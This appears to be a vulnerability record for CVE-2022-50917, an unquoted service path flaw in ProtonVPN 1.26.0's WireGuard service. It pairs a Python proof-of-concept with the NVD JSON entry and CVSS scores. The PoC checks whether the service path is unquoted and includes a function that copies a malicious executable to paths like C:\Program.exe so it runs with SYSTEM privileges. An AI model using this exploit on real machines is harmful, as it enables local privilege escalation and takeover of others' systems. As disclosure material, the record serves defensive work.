CVE-2022-50917

# CVE-2022-50917 PoC - ProtonVPN Unquoted Service Path # This PoC demonstrates the unquoted service path vulnerability in ProtonVPN WireGuard service # Attackers can place a malicious executable at an intermediate path location import os import sys import subprocess import shutil def check_vulnerability(): """Check if ProtonVPN WireGuard service is installed and vulnerable""" try: # Query the WireGuard service configuration result = subprocess.run( ['sc', 'qc', 'ProtonVPN WireGuard'], capture_output=True, text=True ) if 'BINARY_PATH_NAME' in result.stdout: # Extract the binary path for line in result.stdout.split('\n'): if 'BINARY_PATH_NAME' in line: path = line.split(':', 1)[1].strip() print(f"Service path: {path}") # Check if path contains spaces and is not quoted if ' ' in path and not (path.startswith('"') and path.endswith('"')): print("[+] VULNERABLE: Unquoted path with spaces detected!") return True, path else: print("[-] NOT VULNERABLE or path is properly quoted") return False, path else: print("[-] WireGuard service not found") return False, None except Exception as e: print(f"[-] Error checking service: {e}") return False, None def exploit_unquoted_path(service_path, malicious_exe_path): """ Exploit the unquoted service path by placing malicious executable at an intermediate path location that Windows will try to execute """ # Parse path components path_parts = service_path.strip('"').split('\\') # For each intermediate directory, create potential injection points for i in range(1, len(path_parts)): potential_path = '\\'.join(path_parts[:i]) + '.exe' print(f"[*] Checking: {potential_path}") if not os.path.exists(potential_path): print(f"[+] Can inject at: {potential_path}") print(f"[+] Copy malicious executable to this location") try: # Copy malicious executable to the vulnerable location shutil.copy2(malicious_exe_path, potential_path) print(f"[+] Malicious executable placed at {potential_path}") print("[+] When the service restarts, the malicious code will execute with SYSTEM privileges") return True except Exception as e: print(f"[-] Failed to copy: {e}") return False def main(): print("=" * 60) print("CVE-2022-50917 ProtonVPN Unquoted Service Path Exploit") print("=" * 60) # Check if vulnerable is_vulnerable, service_path = check_vulnerability() if is_vulnerable and service_path: print("\n[*] Vulnerability confirmed!") print("[*] To exploit, place a malicious executable at an intermediate path") print("[*] Example: Copy your payload to C:\\Program.exe") print("[!] This requires administrator privileges to write to system directories") print("[!] Upon service restart, the malicious code will execute with SYSTEM privileges") if __name__ == "__main__": main()

{"cve": {"id": "CVE-2022-50917", "sourceIdentifier": "[email protected]", "published": "2026-01-13T23:15:55.250", "lastModified": "2026-03-02T15:16:27.217", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "ProtonVPN 1.26.0 contains an unquoted service path vulnerability in its WireGuard service configuration that allows local attackers to potentially execute arbitrary code. Attackers can exploit the unquoted path by placing malicious executables in specific file system locations to gain elevated privileges during service startup."}, {"lang": "es", "value": "ProtonVPN 1.26.0 contiene una vulnerabilidad de ruta de servicio sin comillas en la configuración de su servicio WireGuard que permite a atacantes locales ejecutar potencialmente código arbitrario. Los atacantes pueden explotar la ruta sin comillas colocando ejecutables maliciosos en ubicaciones específicas del sistema de archivos para obtener privilegios elevados durante el inicio del servicio."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.5, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, {"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-428"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:proton:protonvpn:1.26.0:*:*:*:*:windows:*:*", "matchCriteriaId": "9782C43C-6EBF-42E8-9AA1-5A76F5C5191F"}]}]}], "references": [{"url": "https://protonvpn.com/", "source": "[email protected]", "tags": ["Broken Link"]}, {"url": "https://www.exploit-db.com/exploits/50837", "source": "[email protected]", "tags": ["Exploit", "VDB Entry"]}, {"url": "https://www.vulncheck.com/advisories/protonvpn-unquoted-service-path", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}